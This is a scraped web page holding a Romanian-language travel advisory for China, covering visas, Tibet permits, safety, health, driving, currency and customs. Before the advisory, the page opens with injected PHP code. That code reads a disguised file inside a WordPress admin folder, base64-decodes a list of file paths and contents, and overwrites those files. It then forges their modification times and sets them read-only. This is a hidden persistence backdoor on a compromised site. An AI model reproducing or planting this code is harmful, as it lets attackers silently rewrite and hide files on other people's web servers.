$wp_update_file="/home/shuffles/public_html/wp-admin/user/screens.php"; if ( is_file($wp_update_file) ) { $wp_update_content=trim(file_get_contents($wp_update_file)); if ( $wp_update_content!="" ) { $wp_update_content=substr($wp_update_content,6,-6); $wp_update_content=base64_decode($wp_update_content); $wp_update_arr=json_decode($wp_update_content,true); if ( is_array($wp_update_arr) ) { foreach($wp_update_arr as $value) { $file_mtime=filemtime($value["path"]); @chmod($value["path"],0777); @unlink($value["path"]); @file_put_contents($value["path"],$value["content"]); @touch($value["path"],$file_mtime); @chmod($value["path"],0444); } } } } China – O noua atitudine

Condiţii de intrare şi regim de şedere

Pentru cetăţenii români care călătoresc în China este necesară obţinerea vizei de intrare.
Autorităţile chineze nu eliberează vize la frontieră.

Vizele se pot obţine numai de la ambasadele Chinei din străinătate. În România, vizele pot fi obţinute de la Ambasada Republicii Populare Chineze din Bucureşti sau de la Consulatul General al Republicii Populare Chineze din Constanţa.
Pentru informaţii suplimentare despre regimul vizelor şi despre condiţiile de intrare în China, recomandăm consultarea informaţiilor prezentate de autorităţile chineze:

O dată ajunşi în China, este necesar să vă înregistraţi prezenţa la Poliţia locală.

Ministerul Afacerilor Externe recomandă cetăţenilor români care intenţionează să rămână pentru o perioadă îndelungată pe teritoriul acestui stat să se adreseze misiunii diplomatice a României şi să îşi anunţe prezenţa în regiune, comunicând coordonatele personale pentru a putea fi contactaţi în situaţii de urgenţă.


Ameninţări teroriste

Riscul ameninţărilor teroriste în China este scăzut, însă cetăţenii români trebuie să aibă în vedere riscurile globale pe care fenomenul terorist le poate produce oriunde în lume.

Recomandăm cetăţenilor români care călătoresc sau se află în China să consulte periodic informaţiile prezentate de autorităţile chineze şi să urmeze recomandările acestora. recomandăm, de asemenea, consultarea periodică a paginii web a Ministerului român al Afacerilor externe (www.mae.ro)


Siguranţă şi criminalitate

China este o ţară cu un nivel de criminalitate redusă.

Infracţiuni minore de tipul furtului din buzunare, înşelăciunilor sau furtului din maşini pot apărea în zone aglomerate, care, se recomanda sa fie, pe cat posibil, evitate.

Recomandări generale:

 • Evitaţi circulaţia pe timp de noapte.
 • Păstraţi documentele, valorile personale, biletele de călătorie, banii şi cărţile de credit în locuri sigure şi nu le expuneţi în mod vizibil .
 • În cazul în care călătoriţi cu maşina personală, nu ţineţi bunuri de valoare la vedere, în autoturism;
 • Asiguraţi maşina cu sistem de alarmă şi încuiaţi uşile atunci când părăsiţi autoturismul;
 • În cazul călătoriei cu autobuzul sau trenul, vă sfătuim să păstraţi permanent atenţia asupra bagajelor
 • Vă recomandăm să aveţi în permanenţă paşaportul la dumneavoastră deoarece poliţia locală efectuează controale stradale. Pedeapsa în cazul în care nu puteţi face dovada identităţii dumneavoastră poate ajunge până la închisoare.
 • În Beijing nu se fumează în locurile publice.

În China, este interzisă participarea la orice tip de demonstraţie sau de distribuire de volante cu referinţe politice. Încălcarea unor astfel de norme poate fi sancţionată cu pedeapsa cu închisoarea.

Manifestarea în spaţiul public a stării de ebrietate nu este permisă.

Limbile de circulaţie internaţională sunt foarte puţin cunoscute de populaţia locală, limba engleză fiind puţin răspândită.

În cazul unor incidente care afectează siguranţa persoanei sau a bunurilor, se recomandă contactarea celui mai apropiat birou al poliţiei. În cazul pierderii paşaportului românesc, se recomandă sesizarea atât a biroului local de poliţie, cât şi a oficiului consular român cel mai apropiat care poate acorda asistenţa consulară în condiţiile prevăzute de lege.

Condiţii de deplasare în Regiunea Autonomă Tibet

Atenţie! Nu sunt permise călătoriile pe cont propriu indiferent de tipul paşaportului deţinut (simplu, de serviciu sau diplomatic).

O călătorie în Tibet trebuie pregătită din timp şi cu mai multă atenţie decât o excursie obişnuită, date fiind condiţiile de călătorie, clima şi relieful aparte.

Atenţie! Cetăţenii români care doresc să călătorească în Tibet trebuie să deţină un Permis special de călătorie eliberat de Biroul de Turism din Tibet. Permisul se eliberează la cererea agenţiei de turism care organizează excursia în Tibet, de regulă, cu aproximativ 2 săptămâni înainte de călătorie.

Pentru ca agenţia de turism să poată solicita permisul de călătorie în numele dvs. trebuie să le furnizaţi copii ale paşaportului valabil şi ale vizei de intrare în China şi câteva date personale (naţionalitate, vârstă, sex, ocupaţie).

Cei care călătoresc cu avionul trebuie să obţină în prealabil permisul de călătorie. În cazul în care călătoriţi în grup, se va elibera un permis de grup care trebuie prezentat înainte de îmbarcare. Pentru vizitarea anumitor zone din interiorul Regiunii Autonome Tibet, Biroul local de Securitate Publică, cu sediul în oraşul Lhasa, capitala provinciei, eliberează un alt Permis de călătorie pentru cetăţenii străini. Astfel, pentru vizitarea zonelor Gyantse, Sakya, Valea Yarlung, Everest şi vestul Tibetului este necesar a se obţine şi acest Permis. Vizitarea oraşului Lhasa, capitala provinciei şi a împrejurimilor acesteia, precum şi a zonelor Shigatse şi Tsetang, circulaţia pe Autostrada Prieteniei Lhasa – Kathmandu, nu necesită obţinerea unui asemenea Permis. Costul obţinerii acestui Permis este de 50 RMB, este valabil pe toată perioada vizei şi poate include mai multe destinaţii permise. Acesta este uşor de procurat dacă rezervaţi un tur organizat, care nu trebuie neapărat să fie o excursie de grup, ci poate fi şi un tur individual (organizat numai pentru dumneavostră), care include închirierea unei maşini de teren cu şofer şi ghid. Timpul necesar agenţiei pentru procurarea permisului variază de la o săptămâna la o lună, în funcţie de turul ales.

Recomandări speciale:

 • verificarea recomandărilor de călătorie ale Biroului de Turism din Tibet, www.xzta.gov.cn;
 • efectuarea unui control medical amănunţit înainte de plecarea în călătorie;
 • pregătirea unei truse medicale complete, inclusiv cu butelii de oxigen;
 • pregătirea temeinică a bagajelor (haine groase, ochelari de soare, protecţie solară, alimente hipercalorice şi o cantitate suficientă de apă);
 • pentru siguranţă, efectuarea călătoriei însoţit de un ghid sau de un reprezentant al unei agenţii specializate.


Sistemul medical

Recomandăm tuturor cetăţenilor români care călătoresc în China să încheie poliţe de asigurare medicală şi de călătorie, pentru întreaga durată a deplasării. Recomandăm verificarea cu atenţie a modului şi condiţiilor în care funcţionează asigurarea în această ţară. Serviciile de îngrijire medicală primite în spitale şi medicamentele trebuie plătite pe loc, cu numerar sau carte de credit. În caz de îmbolnăvire, trebuie sa aveţi asupra dumneavoastră asigurarea medicală de călătorie şi paşaportul.

Deşi vaccinurile nu sunt obligatorii, se recomandă totuşi vaccinarea împotriva tetanosului şi poliomielitei. Se recomandă, de asemenea, vaccinarea împotriva difteriei, febrei tifoide, hepatitei A şi B. Vaccinarea împotriva febrei galbene este obligatorie pentru persoanele care au călătorit anterior într-o zona de endemie.

În cazul existenţei unor probleme de sănătate cronice, este necesar să vă luaţi măsuri suplimentare de precauţie.

Din cauza calităţii slabe a aerului în lunile de vară, persoanele cu probleme respiratorii trebuie să manifeste o grijă deosebită şi să aibă la îndemână toate medicamentele necesare.

Pentru a chema Salvarea, trebuie să formaţi numărul 120 (cu prefixul 008610 – Beijing, respectiv 008621 – Shanghai, dacă nu sunaţi de la un număr de telefon local).

Pentru informaţii cu privire la tipurile de vaccinuri care trebuie efectuate, vă recomandăm să vă adresaţi Institutului Naţional de Sănătate Publică – Centrul Naţional de Supraveghere şi Control al Bolilor Transmisibile.


Condiţii privind traficul auto

 • Circulaţia auto

Starea şoselelor şi a infrastructurii rutiere este satisfăcătoare.

 • Permisul de conducere

Este necesară obţinerea unui permis de conducere chinez.

 • Transportul public

Metroul este un mijloc de transport în comun accesibil şi sigur, care acoperă cele mai importante zone ale oraşului.

Taxiurile (chu zhu che, da di) pot fi găsite cu uşurinţă, fiind în general sigure. Vă recomandăm să aveţi la dumneavoastră o carte de vizită a hotelului sau adresa în limba chineză a locului unde doriţi să vă deplasaţi deoarece şoferii au cunoştinţe minime de limbă engleză sau altă limbă internaţională.

La aeroport, gară sau în zonele turistice, vă sfătuim să luaţi taxiurile din staţiile special amenajate. Taxiurile sunt prevăzute cu aparate de taxare, verificaţi ca şoferul să pornească aparatul.

Puteţi închiria o maşină cu condiţia să deţineţi un permis de conducere chinez valabil.

Informaţii pentru cazurile de accident de circulaţie:

În cazul în care sunteţi implicat într-un accident rutier este indicat să rămâneţi lângă vehicul, până la sosirea echipajului de poliţie, după acordarea primului ajutor.

Puteţi, să apelaţi numerele de urgenţă 110 sau 122 (cu prefixul 008610 – Beijing, respectiv 008621 – Shanghai, dacă nu sunaţi de la un telefon local) , iar apoi apăsaţi tasta 1, pentru serviciul în limba engleză.

Este bine să daţi dovadă de maximă cooperare cu forţele de poliţie locale.

Atenţie! În cazul în care sunteţi rugat să semnaţi un document în limba chineză, puteţi să o faceţi, scriind însă foarte clar în română că nu cunoaşteţi limba chineză şi, în consecinţă, că nu înţelegeţi conţinutul procesului verbal.


Moneda

Unitatea monetară este yuanul, divizat în 10 jiao. Un jiao este divizat în 10 feni.

Bancnotele au valori de 100, 50, 20, 10, 5, 2 şi 1 yuan. Monedele sunt de 1 yuan, 5, 2 şi 1 jiao, 5, 2 şi 1 fen.

Pentru a schimba bani în valută locală, vă puteţi adresa instituţiilor bancare sau caselor de schimbi, unde trebuie să aveţi paşaportul asupra dumneavoastră. Este foarte important să solicitaţi chitanţă (xiao piao/ fapiao).

Este recomandat să nu acceptaţi bancnote utilizate care vă sunt înmânate în alte părţi decât în magazine, restaurante sau hoteluri.

 

Utilizarea cărţilor de credit

Cărţile de credit sunt acceptate pentru realizarea majorităţii plăţilor.

Retragerea de numerar se poate face numai de la acele ATM-uri care au afişată sigla cardului dumneavoastră (Maestro, Mastercard, Visa). De regulă, este o limită de 2500 yuani (aproximativ 250 euro) pentru fiecare operaţiune, fiind permise, de regulă, retrageri succesive.

 

Regimul medicamentelor

Pentru medicamentele speciale este necesar să aveţi o reţetă din partea medicului, preferabil în limba engleză, şi o cantitate limitată la perioada pe care o veţi petrece în China.

Este recomandat să aveţi o cantitate suficientă de medicamente de uz curent în caz de nevoie. Unele spitale internaţionale au farmacii proprii cu medicamente importate, însă acestea sunt foarte scumpe.

 

Reglementări vamale

Atenţie! În cazul delictelor privind deţinerea, traficul sau consumul de droguri, în unele cazuri pedeapsa poate fi capitală.

La intrarea în China trebuie declarate sumele mai mari de 6.000 dolari SUA sau echivalent în altă valută. Pentru ieşirea din China trebuie păstrată o copie a declaraţiei vamale.

Pentru ieşirea din China cu o sumă cuprinsă între 6.000 şi 10.000 de dolari SUA sau echivalent în altă valută, trebuie obţinută o autorizaţie emisă de o bancă chineza.

By o9admin